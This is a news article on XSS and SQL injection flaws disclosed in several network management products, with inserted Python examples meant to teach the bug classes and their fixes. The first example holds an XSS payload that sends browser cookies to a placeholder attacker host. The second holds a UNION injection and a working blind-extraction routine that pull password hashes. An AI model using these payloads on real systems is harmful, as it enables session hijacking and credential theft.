XSS, SQLi Flaws Found in Network Management Systems

Researchers have identified several vulnerabilities in the network management system (NMS) products offered by various companies.
NMS solutions are designed to allow IT teams to discover and monitor devices on a network and track a network’s performance. Deral Heiland of Rapid7 and independent researcher Matthew Kienow discovered SQL injection and cross-site scripting (XSS) vulnerabilities in NMS products from Spiceworks, Ipswitch, Castle Rock Computing and Opsview.

According to Rapid7, the web application in Spiceworks Desktop is plagued by a persistent XSS vulnerability (CVE-2015-6021) that can be exploited by an unauthenticated attacker who has access to the network segment scanned by the product. The security hole affects versions 7.3.00065, 7.3.00076 and 7.4.00075.

An attacker can set up a malicious host that uses a Simple Network Management Protocol (SNMP) agent containing an XSS payload. The malicious code is executed when the attacker’s host is scanned and when the victim visits certain pages in the web interface.

The flaw was reported to Spiceworks on September 1 and it was patched on December 1 with the release of version 7.5. The vendor says it’s not aware of any exploits for the vulnerability.

The WhatsUp Gold NMS product from Ipswitch is plagued by both stored XSS (CVE-2015-6004) and SQL injection (CVE-2015-6005) vulnerabilities.

The XSS vulnerability can be exploited by an unauthenticated attacker via SNMP during the product’s network device discovery process. The malicious code gets executed when the user views the malicious device in the web interface’s discovery console.

An unauthenticated attacker can also execute arbitrary HTML and JavaScript code by injecting it into a spoofed SNMP trap message. The code is executed when the victim views the trap information in the dashboard.
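The Spiceworks and WhatsUp Gold bugs above share one root cause: strings learned from an SNMP agent during discovery (sysName, sysDescr) or carried in a trap varbind are written into the web console without escaping. The following added example, which is not code from Rapid7 or any of the vendors named here, models that pattern with a constructed varbind set containing script payloads, shows the vulnerable renderer beside an escaped one, and adds a simple check an operator can run over incoming SNMP strings. The OID-to-field mapping and the HTML layout are assumptions made for the illustration.

```python
"""Stored XSS from SNMP-sourced strings: vulnerable vs. hardened rendering.

Added example (not code from Rapid7, Spiceworks, Ipswitch, Opsview or
Castle Rock). An NMS stores what a device's SNMP agent reports during
discovery and what arrives in traps, then renders it in the web console.
"""
import html
import re

# Constructed: strings a malicious host's SNMP agent could return during
# discovery. Real OIDs: sysDescr.0 and sysName.0.
DISCOVERY_VARBINDS = {
    "1.3.6.1.2.1.1.1.0": "<script>fetch('//attacker.example/c?'+document.cookie)</script>",
    "1.3.6.1.2.1.1.5.0": 'core-sw1" onmouseover="alert(1)',
}
# Constructed: a spoofed SNMPv2c linkDown trap carrying a payload in ifDescr.3.
TRAP_VARBINDS = {
    "1.3.6.1.6.3.1.1.4.1.0": "1.3.6.1.6.3.1.1.5.3",  # snmpTrapOID.0 = linkDown
    "1.3.6.1.2.1.2.2.1.2.3": "<img src=x onerror=alert(document.domain)>",
}


def render_device_vulnerable(varbinds):
    """The bug class in the article: SNMP strings dropped straight into markup."""
    sysdescr = varbinds.get("1.3.6.1.2.1.1.1.0", "")
    sysname = varbinds.get("1.3.6.1.2.1.1.5.0", "")
    return f'<tr><td title="{sysname}">{sysname}</td><td>{sysdescr}</td></tr>'


def render_device_fixed(varbinds):
    """Same row, with every SNMP-sourced value escaped for its HTML context.
    quote=True also escapes quotes, which matters inside the title attribute."""
    sysdescr = html.escape(varbinds.get("1.3.6.1.2.1.1.1.0", ""), quote=True)
    sysname = html.escape(varbinds.get("1.3.6.1.2.1.1.5.0", ""), quote=True)
    return f'<tr><td title="{sysname}">{sysname}</td><td>{sysdescr}</td></tr>'


def render_trap_fixed(varbinds):
    """Trap varbinds are attacker-controlled too: escape each OID and value."""
    items = "".join(
        f"<li>{html.escape(oid)} = {html.escape(val, quote=True)}</li>"
        for oid, val in varbinds.items()
    )
    return f"<ul>{items}</ul>"


_MARKUP = re.compile(r"[<>\"']|&#|javascript:", re.IGNORECASE)


def suspicious_snmp_strings(varbinds):
    """Detection aid: return the OIDs whose values carry HTML/JS metacharacters.
    Legitimate sysDescr/sysName/ifDescr values essentially never contain these,
    so a hit is worth alerting on even after the NMS is patched."""
    return sorted(oid for oid, val in varbinds.items() if _MARKUP.search(val))


if __name__ == "__main__":
    print(render_device_vulnerable(DISCOVERY_VARBINDS))
    print(render_device_fixed(DISCOVERY_VARBINDS))
    print(render_trap_fixed(TRAP_VARBINDS))
    print(suspicious_snmp_strings(DISCOVERY_VARBINDS))
```

The escaping must happen at output time and per context (element body versus attribute), which is why the fixed renderer does not try to "clean" the stored value; the detection helper is what you point at the raw SNMP data.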

The SQL injection vulnerability in Ipswitch WhatsUp Gold can be exploited by an authenticated attacker to extract information from the database.

The vulnerabilities, which affect versions 16.3.1 and earlier, were reported by Rapid7 on September 1 and were patched on December 16 with the release of WhatsUp Gold 16.4.1. Ipswitch was first contacted about the SQL injection issue in mid-July after Owen Shearing of 7Safe reported the flaw to CERT/CC.

“At Ipswitch, we take the security of our products very seriously. As soon as the vulnerability was detected, Ipswitch developed a fix which was released on December 16 and is now available to all customers through the customer portal,” Ipswitch representatives told SecurityWeek.

A persistent XSS vulnerability (CVE-2015-6035) that can be exploited via malicious SNMP traps has also been found in Opsview. Researchers also discovered a reflected XSS vulnerability in Opsview’s NMS product.

The flaws affect versions 4.6.3 and earlier. They were fixed on November 6 with the release of Opsview 4.5.4 and 4.6.4, which address several other XSS flaws as well.

XSS and SQL injection bugs were also found in Castle Rock Computing’s SNMPc Enterprise product and its associated SNMPc OnLine reporting and monitoring tool.

The persistent XSS (CVE-2015-6027) can be exploited by an unauthenticated attacker to execute arbitrary JavaScript code in the product’s web console. Just like in the case of Ipswitch WhatsUp Gold, the malicious code can be delivered during the device discovery process or via SNMP trap messages.

The SQL injection vulnerability (CVE-2015-6028) can be leveraged by an authenticated attacker to extract information from the application database. Rapid7 has pointed out that the SQL injections found in these NMS products can easily be exploited with open source tools such as sqlmap.
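To show what "extract information from the database" and "easily exploited with sqlmap" mean for the WhatsUp Gold and SNMPc SQL injections, here is an added example that is not code from either product. It uses a constructed SQLite schema (a devices table and a users table) and an assumed device-lookup query; the real products' schemas and injection points are not described in the article. It contrasts the concatenated query with a bound-parameter version, then runs a UNION extraction and the boolean-based blind extraction that sqlmap automates when the result set is not displayed.

```python
"""SQL injection in an authenticated NMS query: vulnerable vs. parameterised.

Added example; schema, query and data are constructed for illustration and
are not taken from WhatsUp Gold or SNMPc.
"""
import sqlite3
import string


def make_db():
    """Constructed database: device inventory plus a credentials table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE devices (id INTEGER PRIMARY KEY, hostname TEXT, ip TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
        INSERT INTO devices VALUES (1, 'core-sw1', '10.0.0.1'), (2, 'edge-fw1', '10.0.0.2');
        INSERT INTO users VALUES (1, 'admin', '$2b$12$constructedhashforillustration');
    """)
    return conn


def find_device_vulnerable(conn, hostname):
    """String concatenation: the pattern behind the injections in the article."""
    sql = "SELECT hostname, ip FROM devices WHERE hostname = '" + hostname + "'"
    return conn.execute(sql).fetchall()


def find_device_fixed(conn, hostname):
    """Bound parameter: the value is data, never parsed as SQL."""
    return conn.execute(
        "SELECT hostname, ip FROM devices WHERE hostname = ?", (hostname,)
    ).fetchall()


# Constructed attacker input: a UNION that routes another table's columns
# through the device-lookup result set (two columns to match the SELECT).
UNION_PAYLOAD = "x' UNION SELECT username, pw_hash FROM users--"

# Character set for the blind probe; the quote is excluded so probes stay valid.
BLIND_ALPHABET = string.ascii_letters + string.digits + "$./"


def blind_extract(conn, query_fn, target_sql, length, alphabet=BLIND_ALPHABET):
    """Boolean-based blind extraction: one character per true/false response.
    This is what sqlmap automates when the page shows only whether a row
    came back, not its contents."""
    out = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            probe = f"core-sw1' AND substr(({target_sql}),{pos},1)='{ch}'--"
            if query_fn(conn, probe):  # row returned => guessed character is right
                out += ch
                break
        else:
            break  # no candidate matched; stop rather than loop forever
    return out


if __name__ == "__main__":
    db = make_db()
    print(find_device_vulnerable(db, UNION_PAYLOAD))
    print(find_device_fixed(db, UNION_PAYLOAD))
    print(blind_extract(db, find_device_vulnerable,
                        "SELECT pw_hash FROM users WHERE username='admin'", 6))
```

With the parameterised query both techniques fail, because the whole payload is compared as a hostname string; that is the fix Ipswitch and Castle Rock shipped in substance, whatever the exact code change was.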

Castle Rock Computing representatives told SecurityWeek that the vulnerabilities have been confirmed and addressed by the company's engineering team. Patches were posted to the company's help desk on December 17, and the fixes will also be included in the next full release of SNMPc (9.0.9), scheduled for January 4, 2016.

*Updated with statement from Ipswitch and Castle Rock Computing

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.